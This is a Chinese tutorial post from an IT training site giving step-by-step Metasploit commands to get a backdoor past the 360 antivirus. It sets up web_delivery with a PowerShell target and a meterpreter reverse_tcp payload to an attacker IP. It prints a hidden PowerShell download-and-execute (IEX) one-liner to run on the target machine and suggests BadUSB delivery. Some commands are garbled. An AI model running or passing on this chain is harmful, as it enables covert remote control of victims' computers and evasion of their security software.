测试用例:Metasploit后门免杀模块绕过360
晓晓 2018-03-14 来源 :网络 阅读 2808 评论 0

摘要:Metasploit后门免杀模块绕过360

Metasploit后门免杀模块绕过360

1.第一步:使用msf的脚本后门模块

  use exploit/multi/script/web_delivery

2.第二步:使用 show opinion 查看需要使用的相关参数

  show options

  可看到下列参数:需要选择的是target、payload选项(包含ip以及端口)、uripath等

测试用例:Metasploit后门免杀模块绕过360

3.第三步:查看target 包含多少可选的目标选项,使用以下参数查看

  show targets

  可看到下列选项包含:Python/PHP/powershell

测试用例:Metasploit后门免杀模块绕过360

4.第四步:设置target 我们这里选择2 —-powershell的这脚本

  set target 2

5.第五步:设置payload选项,设置windows(powershell)反弹shell链接

  set payload windows/meterpreter/reverse_tcp

6.第六步:设置攻击者-端口默认是:4444,也可以更改 我这里就不设置了,直接用默认的端口

  set LHOST 192.168.1.101

7.第七步:设置uripath 路径 设置为根目录—– ‘/‘

  set URIPATH /

8.第八步:执行后门

  exploit /

9.第九步:将代码复制目标机器上cmd 下运行——-利用思路可以用到“Badusb”等多种思路

  powershell.exe -nop -w hidden -c $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials[Net.CredentialCache]::DefaultCredentials;IEX $O.downloadstring(‘http192。168。1。101:8080/‘); /度娘真的疯了 内网ip都吞

10.可看到反弹shell

  session -i //查看回话ID 获取回话进入meterpreter 回话

测试用例:Metasploit后门免杀模块绕过360

本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注职坐标软件测试之测试工具频道!


本文由 @晓晓 发布于职坐标。未经许可,禁止转载。
喜欢 | 0 不喜欢 | 0
看完这篇文章有何感觉?已经有0人表态,0%的人喜欢 快给朋友分享吧~
评论(0)
后参与评论

您输入的评论内容中包含违禁敏感词

我知道了

助您圆梦职场 匹配合适岗位
验证码手机号,获得海同独家IT培训资料
选择就业方向:
人工智能物联网
大数据开发/分析
人工智能Python
Java全栈开发
WEB前端+H5

请输入正确的手机号码

请输入正确的验证码

获取验证码

您今天的短信下发次数太多了,明天再试试吧!

提交

我们会在第一时间安排职业规划师联系您!

您也可以联系我们的职业规划师咨询:

小职老师的微信号:z_zhizuobiao
小职老师的微信号:z_zhizuobiao

版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
 沪公网安备 31011502005948号    

©2015 www.zhizuobiao.com All Rights Reserved

208小时内训课程